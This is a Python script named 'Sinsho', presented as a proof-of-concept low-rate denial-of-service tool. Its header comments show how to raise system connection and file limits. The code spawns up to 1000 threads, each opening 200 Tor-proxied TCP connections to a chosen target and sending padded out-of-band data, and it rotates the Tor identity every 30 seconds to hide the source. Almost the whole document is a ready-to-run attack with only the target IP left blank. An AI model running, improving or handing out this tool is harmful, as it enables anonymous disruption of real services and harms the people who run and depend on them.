Sinsho – Low Rate Denial of Service

Sinsho is a proof of concept denial of service software that takes advantage of vulnerabilities in the TCP/IP Protocol. Updated for Python3

### In order to use this script you will need to adjust values for
### max open file descriptors on your operating system
### How this is done is dependant on your operating system

### Debian ###
### sysctl -w fs.file-max=100000 ###
### ulimit -n 100000 ###

### /proc/sys/net/ipv4/
### tcp_retries1, tcp_retries2

### sysctl -w net.ipv4.tcp_retries1=1
### sysctl -w net.ipv4.tcp_retries2=1
### sysctl -w net.ipv4.tcp_fin_timeout=1

# HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP\Parameters
# TcpTimedWaitDelay - 300
# TcpMaxDataRetransmissions - 1
# TcpMaxConnectRetransmissions - 1
# InitialRttData - 65535

# Windows 7 SP1 - File Handle Quota
# HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\
# USERProcessHandleQuota - 100000	


import socket
import socks
import time
from threading import *
import errno


##### GLOBALS #####
##### CHANGE THESE VALUE #####

target = "<replace with valid ip address>"        # Will not work against loopback - change this
port = 14569
connections = 200               # Connections per thread
threads = 1000                  # Open File Descriptors
torChange = 30                  # Time between Tor IP Change in seconds
torPort = 9050       
torControlPort = 9051           # Type in terminal "tor ControlPort 9051"

##################


### This is the thread sleep time
### Or iteration time between creating new threads
timeout = 2.0 # Edit if needed
##################

def log(message):
    print(message)


def newIdentity():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) 
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    sock.settimeout(None)
    sock.connect(("127.0.0.1", torControlPort))
    while True:
        try:
            sock.send('AUTHENTICATE \"\"\r\nSIGNAL NEWNYM\r\n'.encode())            
            log("Tor Auth: success!")
            log("New identity requested")
            sock.recv(1024)
            log("Reply: from Tor")
        except socket.error as e:
            if isinstance(e.args, tuple):
                if e[0] == errno.EPIPE:
                    log("Broken Pipe: socket error %s" % e)
                else:
                    # determine and handle different error
                    log("Socket error %s" % e)
                    pass
            else:
                #log("Socket error %s" % e)
                pass
        time.sleep(torChange)
    return sock


def initTorCon(target, port):
    sock = socks.socksocket()
    sock.setproxy(socks.PROXY_TYPE_SOCKS5, addr="127.0.0.1", port=torPort)
    sock.settimeout(None)
    sock.connect((target, port))
    return sock

 
def sinsho():
    socks = {}
    for i in range(connections):
        socks[i] = initTorCon(target, port)
        data =  "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data += "414141414141414141414141414141414141414141414141414141414141"
        data = data.encode()
        socks[i].send(data, socket.MSG_OOB | socket.MSG_DONTROUTE)
        log("[+] Packet sent...")

            
def main():
    thread_array = []
    log("[+] Initiating Sinsho")
    log("[+] Target: %s" % target)
    log("[+] Port: %s" % port)    
    log("[+] Starting Single Tor Thread")
    thread = Thread(target = newIdentity)
    thread.start()
    
    for i in range(threads):
        thread = Thread(target = sinsho)
        thread.start()
        thread_array.append(thread)
        time.sleep(timeout)
    
    for thread in thread_array:
        thread.join()
        
    time.sleep(torChange)


if __name__ == '__main__':
    main()